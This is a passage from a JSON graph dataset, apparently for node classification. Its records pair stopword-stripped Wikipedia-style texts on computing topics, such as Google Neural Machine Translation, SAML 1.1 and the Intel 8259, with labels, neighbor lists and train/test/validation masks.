      3535,
      3538,
      3548,
      3567,
      3571,
      3573,
      3576,
      3577,
      3578,
      3583,
      3590,
      3594,
      3595,
      3603,
      3605,
      3610,
      3615,
      3633,
      3641,
      3642,
      3644,
      3648,
      3657,
      3665,
      3667,
      3691,
      3734,
      3738,
      3744,
      3753,
      3760,
      3771,
      3777,
      3789,
      3790,
      3793,
      3815,
      3822,
      3827,
      3830,
      3833,
      3834,
      3841,
      3843,
      3856,
      3857,
      3864,
      3872,
      3875,
      3881,
      3885,
      3886,
      3890,
      3901,
      3903,
      3904,
      3914,
      3918,
      3922,
      3939,
      3942,
      3944,
      3958,
      3966,
      3970,
      3974,
      3975,
      3978,
      3980,
      3981,
      3984,
      3994,
      3996,
      4001,
      4020,
      4029,
      4039,
      4040,
      4047,
      4051,
      4056,
      4061,
      4073,
      4074,
      4075,
      4085,
      4086,
      4089,
      4097,
      4100,
      4104,
      4106,
      4114,
      4115,
      4127,
      4130,
      4138,
      4140,
      4141,
      4143,
      4146,
      4147,
      4148,
      4151,
      4160,
      4162,
      4170,
      4171,
      4173,
      4174,
      4178,
      4182,
      4194,
      4208,
      4210,
      4218,
      4228,
      4229,
      4235,
      4236,
      4240,
      4245,
      4247,
      4248,
      4255,
      4259,
      4268,
      4289,
      4298,
      4305,
      4306,
      4310,
      4316,
      4321,
      4325,
      4326,
      4334,
      4347,
      4356,
      4365,
      4369,
      4373,
      4374,
      4390,
      4401,
      4402,
      4405,
      4409,
      4421,
      4423,
      4439,
      4441,
      4454,
      4457,
      4458,
      4473,
      4479,
      4480,
      4490,
      4492,
      4505,
      4506,
      4511,
      4512,
      4514,
      4515,
      4521,
      4525,
      4536,
      4540,
      4542,
      4550,
      4563,
      4564,
      4568,
      4580,
      4584,
      4589,
      4590,
      4597,
      4614,
      4623,
      4624,
      4627,
      4630,
      4637,
      4641,
      4642,
      4643,
      4647,
      4648,
      4656,
      4658,
      4661,
      4677,
      4680,
      4684,
      4692,
      4703,
      4704,
      4710,
      4712,
      4724,
      4727,
      4728,
      4729,
      4731,
      4748,
      4758,
      4763,
      4765,
      4771,
      4775,
      4808,
      4814,
      4816,
      4819,
      4822,
      4827,
      4835,
      4836,
      4840,
      4853,
      4859,
      4865,
      4870,
      4885,
      4889,
      4910,
      4924,
      4926,
      4948,
      4953,
      4989,
      4994,
      5000,
      5003,
      5004,
      5008,
      5022,
      5023,
      5024,
      5026,
      5032,
      5037,
      5048,
      5054,
      5057,
      5063,
      5065,
      5067,
      5069,
      5070,
      5075,
      5078,
      5080,
      5093,
      5103,
      5105,
      5106,
      5110,
      5114,
      5115,
      5119,
      5129,
      5142,
      5148,
      5158,
      5164,
      5165,
      5166,
      5173,
      5199,
      5209,
      5225,
      5231,
      5242,
      5247,
      5250,
      5251,
      5264,
      5287,
      5293,
      5294,
      5299,
      5300,
      5301,
      5306,
      5315,
      5316,
      5320,
      5324,
      5327,
      5339,
      5340,
      5348,
      5356,
      5362,
      5363,
      5371,
      5377,
      5378,
      5380,
      5381,
      5397,
      5401,
      5405,
      5406,
      5413,
      5437,
      5450,
      5451,
      5452,
      5454,
      5457,
      5465,
      5470,
      5471,
      5477,
      5484,
      5489,
      5492,
      5500,
      5504,
      5523,
      5526,
      5531,
      5535,
      5536,
      5542,
      5560,
      5569,
      5594,
      5597,
      5600,
      5609,
      5612,
      5619,
      5636,
      5643,
      5650,
      5652,
      5663,
      5666,
      5669,
      5673,
      5677,
      5679,
      5681,
      5682,
      5685,
      5692,
      5694,
      5702,
      5703,
      5721,
      5727,
      5729,
      5734,
      5738,
      5743,
      5746,
      5754,
      5759,
      5760,
      5764,
      5779,
      5784,
      5785,
      5797,
      5799,
      5813,
      5818,
      5819,
      5823,
      5830,
      5833,
      5840,
      5856,
      5860,
      5869,
      5887,
      5900,
      5909,
      5914,
      5927,
      5931,
      5935,
      5952,
      5964,
      5968,
      5969,
      5981,
      5985,
      6004,
      6015,
      6016,
      6022,
      6037,
      6058,
      6062,
      6069,
      6074,
      6075,
      6078,
      6086,
      6087,
      6088,
      6109,
      6112,
      6114,
      6115,
      6119,
      6120,
      6126,
      6128,
      6129,
      6133,
      6135,
      6139,
      6144,
      6147,
      6150,
      6153,
      6154,
      6155,
      6166,
      6169,
      6171,
      6172,
      6180,
      6186,
      6207,
      6213,
      6221,
      6228,
      6231,
      6238,
      6240,
      6245,
      6265,
      6281,
      6291,
      6296,
      6297,
      6307,
      6321,
      6329,
      6338,
      6345,
      6347,
      6351,
      6352,
      6356,
      6358,
      6361,
      6364,
      6367,
      6375,
      6379,
      6380,
      6382,
      6390,
      6395,
      6396,
      6431,
      6437,
      6438,
      6441,
      6443,
      6447,
      6450,
      6451,
      6459,
      6462,
      6468,
      6476,
      6480,
      6482,
      6483,
      6488,
      6490,
      6493,
      6496,
      6506,
      6508,
      6510,
      6513,
      6519,
      6520,
      6521,
      6523,
      6529,
      6532,
      6534,
      6539,
      6550,
      6556,
      6566,
      6579,
      6584,
      6586,
      6594,
      6596,
      6597,
      6614,
      6626,
      6631,
      6637,
      6641,
      6643,
      6657,
      6674,
      6675,
      6679,
      6686,
      6690,
      6696,
      6697,
      6699,
      6701,
      6713,
      6718,
      6730,
      6735,
      6751,
      6759,
      6760,
      6774,
      6780,
      6785,
      6787,
      6800,
      6802,
      6806,
      6820,
      6827,
      6828,
      6830,
      6835,
      6837,
      6838,
      6846,
      6852,
      6868,
      6869,
      6883,
      6893,
      6908,
      6910,
      6921,
      6933,
      6952,
      6962,
      6966,
      6969,
      6970,
      6972,
      6984,
      6988,
      6990,
      6998,
      7000,
      7011,
      7020,
      7022,
      7039,
      7049,
      7051,
      7057,
      7067,
      7076,
      7081,
      7088,
      7101,
      7106,
      7116,
      7121,
      7123,
      7134,
      7139,
      7150,
      7152,
      7166,
      7172,
      7183,
      7187,
      7188,
      7204,
      7209,
      7215,
      7217,
      7223,
      7234,
      7235,
      7238,
      7244,
      7274,
      7285,
      7290,
      7293,
      7301,
      7307,
      7311,
      7323,
      7325,
      7326,
      7340,
      7341,
      7343,
      7346,
      7351,
      7355,
      7356,
      7359,
      7363,
      7372,
      7379,
      7380,
      7381,
      7382,
      7384,
      7398,
      7403,
      7405,
      7413,
      7418,
      7426,
      7431,
      7439,
      7442,
      7456,
      7459,
      7472,
      7477,
      7483,
      7486,
      7502,
      7507,
      7511,
      7515,
      7519,
      7523,
      7525,
      7529,
      7546,
      7554,
      7571,
      7576,
      7580,
      7583,
      7588,
      7593,
      7601,
      7603,
      7605,
      7615,
      7618,
      7626,
      7629,
      7633,
      7645,
      7646,
      7656,
      7664,
      7690,
      7694,
      7701,
      7713,
      7718,
      7728,
      7736,
      7738,
      7739,
      7749,
      7754,
      7763,
      7771,
      7774,
      7776,
      7785,
      7789,
      7796,
      7809,
      7813,
      7817,
      7825,
      7832,
      7838,
      7840,
      7847,
      7849,
      7857,
      7859,
      7861,
      7863,
      7872,
      7875,
      7885,
      7889,
      7906,
      7912,
      7914,
      7919,
      7924,
      7930,
      7932,
      7943,
      7945,
      7950,
      7954,
      7955,
      7957,
      7961,
      7962,
      7970,
      7973,
      7983,
      7986,
      7991,
      7994,
      7999,
      8011,
      8015,
      8024,
      8032,
      8034,
      8040,
      8063,
      8067,
      8069,
      8071,
      8076,
      8079,
      8080,
      8082,
      8092,
      8098,
      8103,
      8114,
      8118,
      8121,
      8124,
      8132,
      8136,
      8157,
      8161,
      8162,
      8169
    ],
    "mask": "Train"
  },
  {
    "node_id": 6798,
    "label": 0,
    "text": "Google_Neural_Machine_Translation:google neural machine translation google neural machine translation gnmt neural machine translation nmt system developed google introduced november 2016 uses artificial neural network increase fluency accuracy google translate gnmt improves quality translation applying example based ebmt machine translation method system learns millions examples gnmt proposed architecture system learning first tested hundred languages supported google translate large end-to-end framework system learns time create better natural translations gnmt capable translating whole sentences time rather piece piece gnmt network undertake interlingual machine translation encoding semantics sentence rather memorizing phrase-to-phrase translations google brain project established 2011 secretive google x research lab google fellow jeff dean google researcher greg corrado stanford university computer science professor andrew ng ng ’ work led biggest breakthroughs google stanford september 2016 research team google announced development google neural machine translation system gnmt november google translate began using neural machine translation nmt preference previous statistical methods smt used since october 2007 proprietary in-house smt technology google translate nmt system uses large artificial neural network capable deep learning using millions examples gnmt improves quality translation using broader context deduce relevant translation result rearranged adapted approach grammatically based human language gnmt proposed architecture system learning first tested hundred languages supported google translate gnmt create universal interlingua rather aimed commonality found many languages considered interest psychologists linguists computer scientists new translation engine first enabled eight languages english french german spanish portuguese chinese japanese korean turkish 2016 march 2017 three additional languages enabled russian hindi vietnamese along thai support added later support hebrew arabic also added help google translate community month mid april 2017 google netherlands announced support dutch european languages related english support added nine indian languages viz hindi bengali marathi gujarati punjabi tamil telugu malayalam kannada end april 2017 list language translation pairs supported google translate neural machine translation nmt model july 2017 languages currently support translation english gnmt system said represent improvement former google translate able handle zero-shot translation directly translates one language another example japanese korean google translate previously first translated source language english translated english target language rather translating directly one language another currently non-english language pairs supported",
    "neighbors": [
      5122,
      2440,
      2059,
      3085,
      11538,
      1044,
      5399,
      538,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      3646,
      6208,
      8514,
      3533,
      5197,
      6223,
      10452,
      8538,
      2781,
      8440,
      2273,
      1890,
      5857,
      7780,
      7918,
      8046,
      8688,
      10231,
      2680,
      7164
    ],
    "mask": "Train"
  },
  {
    "node_id": 6799,
    "label": 3,
    "text": "PlayStation_2_technical_specifications:playstation 2 technical specifications playstation 2 technical specifications describe various components playstation 2 ps2 video game console sixth-generation hardware playstation 2 video game console consists various components heart console configuration central processing unit cpu custom risc processor known emotion engine operates 294 mhz 300 mhz later consoles cpu heavily relies integration two vector processing units known vpu0 vpu1 graphics synthesizer floating-point unit fpu order render 3d graphics components system dvd-rom optical drive dualshock 2 controller provide software user control input playstation 2 software distributed cd-rom dvd-rom addition console play audio cds dvd movies backwards compatible original playstation games accomplished inclusion original playstation cpu also serves ps2 i/o processor ps2 also supports limited functionality original playstation memory cards controllers ps2 dualshock 2 controller upgraded version playstation dualshock analog face shoulder d-pad buttons replacing digital buttons original like predecessor dualshock 2 controller features force feedback technology standard playstation 2 memory card 8 mb capacity uses sony magicgate encryption requirement prevented production memory cards third parties purchase magicgate license memory cards without encryption used store playstation game saves playstation games would unable read write card – card could used backup variety non-sony manufactured memory cards available playstation 2 allowing larger memory capacity standard 8 mb however use unsupported compatibility guaranteed memory cards 128 mb storage space console also features usb ieee 1394 expansion ports compatibility usb ieee 1394 devices dependent software supporting device example ps2 bios boot iso image usb flash drive operate usb printer machine operating system include functionality contrast gran turismo 4 tourist trophy programmed save screenshots usb mass storage device print images certain usb printers playstation 2 hdd installed via expansion bay back console required play certain games notably popular final fantasy xi replaced powerpc-based deckard iop 4 mb sdram starting scph-7500x",
    "neighbors": [
      4098,
      643,
      9091,
      3077,
      11398,
      10761,
      528,
      9508,
      3366,
      6311,
      9126,
      9512,
      684,
      3629,
      9391,
      306,
      1587,
      1461,
      7234,
      1091,
      9543,
      10056,
      6732,
      10316,
      2383,
      6738,
      6873,
      859,
      4060,
      1501,
      607,
      5215,
      9441,
      359,
      8937,
      1776,
      3824,
      5746,
      7028,
      8700,
      7801,
      8316,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 6800,
    "label": 4,
    "text": "Google_App_Runtime_for_Chrome:google app runtime chrome android runtime chrome arc discontinued compatibility layer sandboxing technology running android applications desktop laptop computers isolated environment allowed applications safely run web browser independent user operating system near-native speeds since discontinued google developed another method run android apps chrome os devices android runtime chrome partially open-sourced project development google announced sundar pichai google i/o 2014 developer conference limited beta consumer release september 2014 duolingo evernote sight words vine android applications made available chrome web store installation chromebook devices running os version 37 higher development google taking place behind closed doors individual repository commits code reviews issue tracking kept internal company open sourced parts arc licensed bsd-style license limited beta consumer release september 2014 duolingo evernote sight words vine android applications made available chrome web store installation chromebook devices running os version 37 higher october 2014 three apps added cloudmagic onefootball podcast addict march 2015 anandtech reported vlc media player added coming months april 1 2015 google released arc welder chrome packaged app providing arc runtime application packager intended give android developers preview upcoming technology chance test android apps chrome platform arc builds upon google native client native client platform extended posix-compatible layer top nacl integrated runtime pepper apis emulate linux environment foundation android phone allows running almost unchanged dalvik vm sandboxed environment arc uses chrome permission system android one according security evaluation meng xu arc apps may communicate installed chrome extensions files stored underlying operating system might open avenues various attacks threats mitigated heavily sandboxed environment arc second half 2014 developer tools documentation released google several community efforts arc appeared vlad filippov maintains archon unofficial distribution arc runtime installed non-chromebook computers developer also maintains javascript nodejs tool automate packaging android apps use arc developers created user-friendly tools beyond chromeos-apk simplify packaging applications arcon runtime first chrome packaged app called twerk android application arcon packager used named chrome apk packager name changed google request active reddit community maintains list android apps work arcon runtime vlad filippov published guide run opera mini inside chromium browser reception mostly positive developers expressed confusion wide scale competing development platforms google offers web apps chrome packaged apps android apps delivered arc google responded fully committed platforms encourage developers choose one fits best",
    "neighbors": [
      4995,
      5892,
      3462,
      7816,
      6797,
      5262,
      8719,
      5524,
      7700,
      10645,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      5677,
      7983,
      1203,
      823,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      11343,
      3664,
      3795,
      1240,
      8413,
      6367,
      2658,
      6632,
      9320,
      5483,
      236,
      4972,
      5612,
      9712,
      9970,
      8821,
      3836,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6801,
    "label": 3,
    "text": "Wirth's_law:wirth law wirth law adage computer performance states software getting slower rapidly hardware becoming faster adage named niklaus wirth discussed 1995 article plea lean software wirth attributed saying martin reiser preface book oberon system wrote hope progress hardware cure software ills however critical observer may observe software manages outgrow hardware size sluggishness observers noted time indeed trend becoming obvious early 1987 states two contributing factors acceptance ever-growing software rapidly growing hardware performance customers ignorance features essential versus nice-to-have enhanced user convenience functionality supposedly justify increased size software wirth argues people increasingly misinterpreting complexity sophistication details cute essential hidden cost result calls creation leaner software pioneered development oberon software system developed 1986 1989 based nothing hardware primary goal show software developed fraction memory capacity processor power usually required without sacrificing flexibility functionality user convenience law restated 2009 attributed larry page founder google referred page law first use name attributed sergey brin google i/o conference 2009 common forms use names leading hardware software companies 1990s intel microsoft ceos andy grove bill gates intel giveth microsoft taketh away andy giveth bill taketh away gates law speed software halves every 18 months variant wirth law borrowing name bill gates co-founder microsoft observation speed commercial software generally slows 50 every 18 months thereby negating benefits moore law could occur variety reasons featuritis code cruft developer laziness management turnover whose design philosophy coincide previous manager may law named david may variant stating software efficiency halves every 18 months compensating moore law",
    "neighbors": [
      6656,
      2273,
      6979,
      5798,
      5802,
      78,
      8367,
      4208,
      785,
      1778,
      153,
      7006,
      7775
    ],
    "mask": "None"
  },
  {
    "node_id": 6802,
    "label": 9,
    "text": "Not_Quite_C:quite c quite c nqc programming language application programming interface api native bytecode compiler toolkit lego mindstorms cybermaster lego spybotics systems based primarily c language specific limitations maximum number subroutines variables allowed differ depending version firmware rcx language invented david baum released two books subject simple test program written nqc rcx motor connected output port could look like thus motor go full speed two seconds turned nqc legal tournaments sanctioned first number teams complained far without success nqc compilers integrated development environments ides available many platforms including microsoft windows mac os x linux beos dos one bricx command center compiler sources ide sources",
    "neighbors": [
      1952,
      8262,
      6797,
      10964,
      823,
      2045,
      5790
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6803,
    "label": 2,
    "text": "Adam_Leventhal_(programmer):adam leventhal programmer adam leventhal born 1979 united states american software engineer one three authors dtrace dynamic tracing facility solaris 10 sun microsystems latest os allows users observe debug tune system behavior real time available public since november 2003 dtrace since used find opportunities performance improvements production environments adam joined solaris kernel development team graduating cum laude brown university 2001 b.sc math computer science 2006 adam dtrace colleagues chosen gold winners wall street journal technology innovation awards contest panel judges representing industry well research academic institutions year sun microsystems acquired oracle corp leventhal announced leaving company served chief technology officer delphix 2010 2016",
    "neighbors": [
      9665,
      7983,
      11506,
      8599,
      8671
    ],
    "mask": "Train"
  },
  {
    "node_id": 6804,
    "label": 3,
    "text": "Bonnell_(microarchitecture):bonnell microarchitecture bonnell cpu microarchitecture used intel atom processors execute two instructions per cycle like many x86 microprocessors translates x86 instructions cisc instructions simpler internal operations sometimes referred micro-ops effectively risc style instructions prior execution majority instructions produce one micro-op translated around 4 instructions used typical programs producing multiple micro-ops number instructions produce one micro-op significantly fewer p6 netburst microarchitectures bonnell microarchitecture internal micro-ops contain memory load memory store connection alu operation thus similar x86 level powerful micro-ops used previous designs enables relatively good performance two integer alus without instruction reordering speculative execution register renaming side effect speculative execution invulnerability meltdown spectre bonnell microarchitecture therefore represents partial revival principles used earlier intel designs p5 i486 sole purpose enhancing performance per watt ratio however hyper-threading implemented easy i.e low-power way employ whole pipeline efficiently avoiding typical single thread dependencies 2 march 2008 intel announced new single-core atom z5xx series processor code-named silverthorne used ultra-mobile pcs mobile internet devices mids supersede stealey a100 a110 processor 47 million transistors 25 mm die allowing extremely economical production ~2500 chips single 300 mm diameter wafer atom z500 processor dual-thread performance equivalent predecessor stealey outperform applications use simultaneous multithreading sse3 run 0.8 2.0 ghz tdp rating 0.65 2.4 w dip 0.01 w idle feature 32 kb instruction l1 24 kb data l1 caches 512 kb l2 cache 533 mt/s front-side bus processors manufactured 45 nm process 2 march 2008 intel announced lower-power variants diamondville cpu named atom n2xx intended use nettops classmate pc like predecessors single-core cpus hyper-threading n270 tdp rating 2.5 w runs 1.6 ghz 533 mhz fsb n280 clock speed 1.66 ghz 667 mhz fsb 22 september 2008 intel announced new 64-bit dual-core processor unofficially code-named dual diamondville branded atom 330 used desktop computers runs 1.6 ghz fsb speed 533 mhz tdp rating 8 w. dual core consists two diamondville dies single substrate 2009 nvidia used atom 300 geforce 9400m chipset mini-itx form factor motherboard ion platform although atom processor relatively low-power x86 microprocessor many chipsets commonly used dissipate significantly power example atom n270 commonly used netbooks mid-2010 tdp rating 2.5 w intel atom platform uses 945gse express chipset specified maximum tdp 11.8 w processor responsible relatively small portion total power dissipated individual figures 2.5 w n270 processor 6 w 945gse chipset 3.3 w 82801gbm i/o controller intel also provides us15w system controller hub-based chipset combined tdp less 5 w together atom z5xx silverthorne series processors used ultra-mobile pcs mids though manufacturers released ultra-thin systems running processors e.g sony vaio x initially atom motherboards consumer market featured intel 945gc chipset uses 22 watts early 2009 manufacturers offering lower-power motherboards 945gse us15w chipset atom n270 n280 z5xx series cpu 21 december 2009 intel announced n450 d510 d410 cpus integrated graphics new manufacturing process resulted 20 reduction power consumption 60 smaller die size intel gma 3150 45 nm shrink gma 3100 hd capabilities included on-die gpu netbooks using new processor released 11 january 2010 major new feature longer battery life 10 hours 6-cell systems generation atom codenamed pineview used pine trail platform intel pine trail-m platform utilizes atom processor codenamed pineview-m platform controller hub codenamed tiger point graphics memory controller moved processor paired tiger point pch creates power-efficient 2-chip platform rather 3-chip one used previous-generation atom chipsets 1 march 2010 intel introduced n470 processor running 1.83 ghz 667 mhz fsb tdp rating 6.5 w. new atom n4xx chips became available 11 january 2010 used netbook nettop systems includes integrated single-channel ddr2 memory controller integrated graphics core also features hyper-threading manufactured 45 nm process new design uses half power older menlow platform reduced overall power consumption size makes platform desirable use smartphones mobile internet devices d4xx d5xx series support x86-64 bit instruction set ddr2-800 memory rated embedded use series integrated graphics processor built directly cpu help improve performance models targeted nettops low-end desktops support speedstep atom d510 dual-core processor runs 1.66 ghz 1 mb l2 cache tdp rating 13 w. single-core atom d410 runs 1.66 ghz 512 kb l2 cache tdp rating 10 w. tunnel creek embedded atom processor used queens bay platform topcliff pch lincroft z6xx whitney point pch included oak trail tablet platform oak trail intel atom platform based moorestown platforms include lincroft microprocessor use two distinct input/output platform controller hubs i/o-pch codenamed langwell whitney point respectively oak trail presented 11 april 2011 released may 2011 z670 processor part oak trail platform delivers improved video playback faster internet browsing longer battery life without sacrificing performance according intel oak trail includes support 1080p video decoding well hdmi platform also improved power efficiency allows applications run various operating systems including android meego windows stellarton tunnel creek cpu altera field programmable gate array fpga sodaville consumer electronics atom soc groveland consumer electronics atom soc 32 nm shrink bonnell called saltwell intel released third-generation cedar trail platform consisting range cedarview processors nm10 southbridge chip based 32 nm process technology fourth quarter 2011 intel stated improvements graphics capabilities including support 1080p video additional display options including hdmi displayport enhancements power consumption enable fanless designs longer battery life cedar trail platform includes two new cpus 32 nm-based n2800 1.86 ghz n2600 1.6 ghz replace previous generation pineview n4xx n5xx processors cpus also feature integrated gpu supports directx 9 addition netbook platform two new cedarview cpus nettops d2500 d2700 released 25 september 2011 early march 2012 n2800-based intel dn2800mt motherboard started become available due use netbook processor mini-itx motherboard reach idle power consumption low 7.1 w. penwell atom soc part medfield mid/smartphone platform berryville consumer electronics atom soc cloverview atom soc part clover trail tablet platform december 2012 intel launched 64-bit centerton family atom cpus designed specifically use bordenville platform servers based 32 nm saltwell architecture centerton adds features previously unavailable atom processors intel vt virtualization technology support ecc memory briarwood atom soc designed server platform",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      3470,
      6926,
      5649,
      6033,
      5523,
      6804,
      7313,
      4886,
      8851,
      3352,
      9111,
      5883,
      10669,
      9391,
      5681,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      3537,
      5073,
      5844,
      10715,
      7134,
      1119,
      3175,
      1000,
      7657,
      9707,
      4204,
      5356,
      8044,
      5871,
      1776,
      4465,
      8684,
      499,
      8815,
      3317,
      8820,
      4217,
      4603,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 6805,
    "label": 4,
    "text": "SAML_1.1:saml 1.1 security assertion markup language saml xml standard exchanging authentication authorization data security domains saml product oasis organization security services technical committee saml 1.1 ratified oasis standard september 2003 critical aspects saml 1.1 covered detail official documents samlcore samlbind new saml probably read introductory saml topic first samloverview document oasis prior saml 1.1 saml 1.0 adopted oasis standard november 2002 saml undergone one minor v1.1 one major revision v2.0 since v1.0 relatively simple protocol saml 1.0 historical interest however since us federal e-authentication initiative adopted saml 1.0 core technology versions 1.0 1.1 saml similar see samldiff specific differences two standards article concentrates saml 1.1 since important standard upon many standards implementations depend warning implementers deployers note well code examples article non-normative illustration purposes consult oasis saml specifications normative requirements saml assertions contain statements service providers use make access control decisions instance authentication statements assert service provider principal indeed authenticate identity provider particular time using particular method authentication information principal may disclosed authentication statement authentication statement example e-mail address principal asserted service provider e-mail address example suffice large number situations cases however additional information needed service provider make access control decision example suppose students allowed access scholarships data attribute statement indicate whether principal affiliation student service provider uses allow deny access resp scholarships application attributes often obtained ldap directory consistent representations attributes across security domains crucial example showing student might obtain access scholarships application service provider functioning policy enforcement point policy decision point situations may preferable associate policy decision point identity provider case service provider passes uri identity provider asserts authorization decision statement dictates whether principal allowed access secured resource given uri three statement types mutually exclusive example authentication statements attribute statements may included single assertion shown precludes need make subsequent round trips service provider identity provider saml protocol simple request-response protocol saml requester sends saml codice_1 element responder similarly saml responder returns saml codice_2 element requester bindings profiles needed affect message exchange detailed following sections saml 1.1 formally defines one protocol binding saml soap binding compatible saml 1.1 implementation must implement saml soap http synchronous protocol binding transport mechanisms besides http permitted provided protocol-independent aspects saml soap binding observed see section 3.1.2 samlbind saml 1.1 soap binding built top version 1.1 soap numbering purely coincidental saml requester wraps saml codice_1 element within body soap message similarly saml responder returns saml codice_2 element within body returned soap message error responder returns soap fault code instead saml markup must included soap body saml 1.1 define saml-specific soap headers requester free insert soap headers wishes although none required recall soap 1.1 codice_5 http header must included http request although value may empty saml requester may give following value codice_5 header saml responder must depend value however secure connection required saml requests responses situations message integrity confidentiality required http ssl 3.0 tls 1.0 server-side certificate required saml responder may return 403 forbidden response refuses respond saml requester responder must return 500 internal server error response event soap error soap fault element must included well otherwise 200 ok response returned even presence saml processing error response include saml codice_7 element soap body general profiles describe use cases message exchanges required ultimately transfer assertions identity provider service provider saml 1.1 specifies two web browser sso profiles browser/post profile relies push operation passes sso assertion value browser using http post say identity provider pushes assertion service provider browser/artifact profile employs pull mechanism profile essentially passes sso assertion identity provider service provider reference browser using http redirect subsequently dereferenced via back-channel exchange i.e. service provider pulls assertion identity provider using saml soap http profiles support cross-domain single sign-on sso specification define additional profiles particular saml 1.1 support profile secure web service message support single logout profile saml 1.1 profiles begin inter-site transfer service managed identity provider principal arrives transfer service first place dictated specification see sections 4.1 4.2 samloverview possible scenarios practice client accessing secured resource service provider redirected inter-site transfer service identity provider precise sequence steps needed accomplish outlined saml 1.1 see section 4.3 samloverview rough ideas along lines scenario thoroughly addressed saml 2.0 visiting inter-site transfer service principal transferred assertion consumer service service provider exactly principal transferred inter-site transfer service assertion consumer service depends profile used case browser/artifact profile redirect used case browser/post profile client issues post request without user intervention expedite processing assertion consumer service two separate urls specified endpoint locations may recorded metadata files exactly identity provider obtains trusted metadata file otherwise determines trusted endpoint locations particular service provider scope respect saml 1.1 note conforming saml 1.1 identity provider must provide inter-site transfer service similarly saml 1.1 service provider must provide assertion consumer service saml 1.1 browser/post profile specifies following four 4 steps terminology used original specification modified slightly conform saml 2.0 specification message flow begins request directed idp principal via http user agent requests inter-site transfer service identity provider codice_8 desired resource service provider say nowiki https //sp.example.com/home /nowiki words following get request issued user agent ssl/tls profile specify url transfer service codice_9 parameter obtained user agent inter-site transfer service returns html document containing codice_10 element codice_9 parameter preserved step 1 value codice_12 parameter base64 encoding saml codice_2 element following saml response must digitally signed identity provider important assumed principal already established security context identity provider otherwise inter-site transfer service would unable provide authentication statement saml codice_2 element user agent requests assertion consumer service service provider values codice_9 codice_12 parameters taken html form step 2 note automate submission form following line javascript may appear anywhere page assumes course page contains single codice_10 element codice_18 assertion consumer service consumes saml codice_2 element creates security context service provider redirects user agent target resource saml 1.1 browser/artifact profile specifies following six 6 steps terminology used original specification modified slightly conform saml 2.0 specification message flow begins request directed idp principal via http user agent requests inter-site transfer service identity provider codice_8 desired resource service provider say nowiki https //sp.example.com/home /nowiki words following get request issued user agent ssl/tls profile specify url transfer service codice_9 parameter obtained user agent principal redirected assertion consumer service service provider following response returned user agent codice_22 reference assertion identity provider willing provide upon request important assumed principal already established security context identity provider otherwise inter-site transfer service would unable provide authentication statement user agent requests assertion consumer service service provider codice_8 codice_22 words following get request issued user agent ssl/tls assertion consumer service service provider begins back-channel exchange artifact resolution service identity provider saml soap message bound http post request codice_22 previously sent identity provider service provider steps 2 3 identity provider completes back-channel exchange responding saml assertion bound saml soap message case authentication statement includes codice_26 containing principal e-mail address assertion consumer service parses saml codice_2 element creates security context service provider redirects user agent target resource",
    "neighbors": [
      7368,
      4979,
      820,
      10486,
      6651,
      5433,
      1851,
      6811,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6806,
    "label": 3,
    "text": "Intel_8259:intel 8259 intel 8259 programmable interrupt controller pic designed intel 8085 intel 8086 microprocessors initial part 8259 later suffix version upward compatible usable 8086 8088 processor 8259 combines multiple interrupt input sources single interrupt output host microprocessor extending interrupt levels available system beyond one two levels found processor chip 8259a interrupt controller isa bus original ibm pc ibm pc 8259 introduced part intel mcs 85 family 1976 8259a included original pc introduced 1981 maintained pc/xt introduced 1983 second 8259a added introduction pc/at 8259 coexisted intel apic architecture since introduction symmetric multi-processor pcs modern pcs begun phase 8259a favor intel apic architecture however anymore separate chip 8259a interface still provided platform controller hub southbridge chipset modern x86 motherboards main signal pins 8259 follows eight interrupt input request lines named irq0 irq7 interrupt request output line named intr interrupt acknowledgment line named inta d0 d7 communicating interrupt level vector offset connections include cas0 cas2 cascading 8259s eight slave 8259s may cascaded master 8259 provide 64 irqs 8259s cascaded connecting int line one slave 8259 irq line one master 8259 three registers interrupt mask register imr interrupt request register irr in-service register isr irr maintains mask current interrupts pending acknowledgement isr maintains mask interrupts pending eoi imr maintains mask interrupts sent acknowledgement end interrupt eoi operations support specific eoi non-specific eoi auto-eoi specific eoi specifies irq level acknowledging isr non-specific eoi resets irq level isr auto-eoi resets irq level isr immediately interrupt acknowledged edge level interrupt trigger modes supported 8259a fixed priority rotating priority modes supported 8259 may configured work 8080/8085 8086/8088 8086/8088 interrupt controller provide interrupt number data bus interrupt occurs interrupt cycle 8080/8085 issue three bytes data bus corresponding call instruction 8080/8085 instruction set 8259a provides additional functionality compared 8259 particular buffered mode level-triggered mode upward compatible programming 8259 conjunction dos microsoft windows introduced number confusing issues sake backwards compatibility extends far back original pc introduced 1981 first issue less root second issue dos device drivers expected send non-specific eoi 8259s finish servicing device prevents use 8259 eoi modes dos excludes differentiation device interrupts rerouted master 8259 slave 8259 second issue deals use irq2 irq9 introduction slave 8259 pc/at slave 8259 int output connected master ir2 irq2 line isa bus originally connected ir2 rerouted ir1 slave thus old irq2 line generates irq9 cpu allow backwards compatibility dos device drivers still set irq2 handler installed bios irq9 redirects interrupts original irq2 handler pc bios thus also dos traditionally maps master 8259 interrupt requests irq0-irq7 interrupt vector offset 8 int08-int0f slave 8259 pc/at later interrupt requests irq8-irq15 interrupt vector offset 112 int70-int77 done despite first 32 int00-int1f interrupt vectors reserved processor internal exceptions ignored design pc reason reserved vectors exceptions operating systems map least master 8259 irqs used platform another interrupt vector base offset since operating systems allow changes device driver expectations 8259 modes operation auto-eoi may used especially important modern x86 hardware significant amount time may spent i/o address space delay communicating 8259s also allows number optimizations synchronization critical sections multiprocessor x86 system 8259s since isa bus support level triggered interrupts level triggered mode may used interrupts connected isa devices means pc/xt pc/at compatible systems 8259 must programmed edge triggered mode mca systems devices use level triggered interrupts interrupt controller hardwired always work level triggered mode newer eisa pci later systems edge/level control registers elcrs control mode per irq line effectively making mode 8259 irrelevant systems isa buses elcr programmed bios system startup correct operation elcrs located 0x4d0 0x4d1 x86 i/o address space 8-bits wide bit corresponding irq 8259s bit set irq level triggered mode 